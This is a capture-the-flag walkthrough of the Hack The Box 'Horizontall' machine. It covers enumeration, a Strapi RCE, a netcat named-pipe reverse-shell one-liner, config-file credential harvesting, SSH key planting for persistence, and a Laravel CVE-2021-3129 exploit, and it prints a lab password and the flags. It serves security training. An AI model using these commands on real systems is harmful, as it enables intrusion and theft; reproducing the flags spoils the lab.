sudo vim /etc/hosts
# horizontall.htb
nmap -T4 -p- -A -Pn -v horizontall.htb
feroxbuster -u http://horizontall.htb -w /usr/share/wordlists/dirb/common.txt -x php,html,bak,js,txt,json,docx,pdf,zip,cgi,sh,pl,aspx,sql,xml --extract-links --scan-limit 2
sudo wfuzz -c -f sub-fighter -u "http://horizontall.htb" -H "Host: FUZZ.horizontall.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
#gives false positive for 13 words, so we need to exclude it
sudo wfuzz -c -f sub-fighter -u "http://horizontall.htb" -H "Host: FUZZ.horizontall.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 13
sudo vim /etc/hosts
#add subdomain
feroxbuster -u http://api-prod.horizontall.htb -w /usr/share/wordlists/dirb/common.txt -x php,html,bak,js,txt,json,docx,pdf,zip,cgi,sh,pl,aspx,sql,xml --extract-links --scan-limit 2 --filter-status 401,404,405,500
#search for strapi exploit
python3 http://api-prod.horizontall.htb
#prints jwt
#we get shell
#blind rce, so we don't get output
#migrate to better shell
#setup listener in new tab
nc -nvlp 5555
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 5555 >/tmp/f
#we get reverse shell in new listener
python -c 'import pty;pty.spawn("/bin/bash")'
#strapi user
cd /tmp
#in attacker machine
python3 -m http.server
#get linpeas from attacker machine in shell
chmod +x
#go through config files
cat /opt/strapi/myapi/config/environments/development/database.json
#we get creds
#but it does not work for ssh login
#check listening ports
ss -ltnp
#check what's running on localhost 8000
#we can log into SSH as strapi from our machine
cd /opt/strapi
mkdir .ssh
cd .ssh
#now, in attacker machine
ssh-keygen -f strapi
#no need for passphrase
#this generates strapi (private key) and (public key)
chmod 600 strapi
#copy contents
#in reverse shell
#copy contents to authorized_keys
echo "ssh-rsa ..... sv@kali" > authorized_keys
chmod 600 authorized_keys
#now, in attacker machine
ssh -i strapi [email protected]
#we can login as strapi now
#escape ssh using Enter + ~ + C keybind
#port forwarding
#in ssh prompt
-L 8000:
#now we can access the page on localhost:8000
#for laravel v8 exploit
python3 Monolog/RCE1 whoami
python3 Monolog/RCE1 'cat /home/developer/user.txt'
python3 Monolog/RCE1 'cat /root/root.txt'
Open ports & services:
- 22 - ssh - OpenSSH 7.6p1
- 80 - http - nginx 1.14.0 (Ubuntu)
We can begin enumerating the webpage on port 80 -
finds /css, /img and /js, but we cannot access those directories. -
As the webpage does not contain anything significant, we can attempt to search for subdomains.
With the help of
, we can attempt to search for subdomains - we need to exclude the subdomains with 13 words due to false positives. -
takes time, but eventually we get the subdomain 'api-prod' - we need to add this entry to our /etc/hosts file. -
An alternate way to find this subdomain is by checking the JS files for the webpage - the app script mentions http://api-prod.horizontall.htb/reviews endpoint.
Now, we can start enumerating the subdomain using
and check for hidden pages. -
We find these directories in the subdomain:
- /admin
- /reviews
- /robots.txt
- /users
The /admin page contains a login portal for
, while /reviews and /users are .json data. -
Now, we can Google for
to know more about it - seems to be a CMS. -
Googling for exploits related to this, we get multiple results - we can try the RCE exploit.
Now, for the exploit, we can navigate to http://api-prod.horizontall.htb/admin/init and confirm the version - it shows strapi version 3.0.0-beta.17.4 - so this exploit would work.
Running the exploit gives us a limited shell - it is based on blind RCE - so we can setup a new listener and run a reverse-shell one-liner to get another shell.
Now, we are user 'strapi'; we can enumerate other users' directories for clues.
We can use
for basic enumeration. -
Using this, we are able to find some readable config files in /opt/strapi/myapi/config/environments/development/database.json - this contains the creds "developer:#J!:F9Zt2u".
We can try logging into SSH as developer user with the found password, but it does not work.
Now, checking for listening ports, we can see that we have ports listening on port 1337, 3306, and 8000 - 1337 is running nodejs and 3306 is used for mySQL.
To check what's on, we can use
. -
We can see that this port is running
Laravel v8
- Googling for exploits related to this version gives us results for CVE-2021-3129. -
Now, we need to access this page in order to exploit.
As we can write in strapi user's directory, we can create SSH key pair on our machine, drop a key in victim machine, and access from our machine using SSH.
After logging into the victim machine as strapi using SSH, we can escape the current SSH session using
Enter + ~ + C
Now, from our SSH session, we can use SSH tunneling to get access to the webpage running on port 8000.
We can confirm that the page on localhost:8000 is running Laravel v8.
We can get the exploit for this from GitHub; executing it gives us the output of the command given as parameter.
So, we can execute the commands to get user flag and root flag through the exploit script.
1. User flag - 35889a008d63a847aa0d84860b5a79c8
2. Root flag - 0594c6be727a664d2218045e7b3e42b8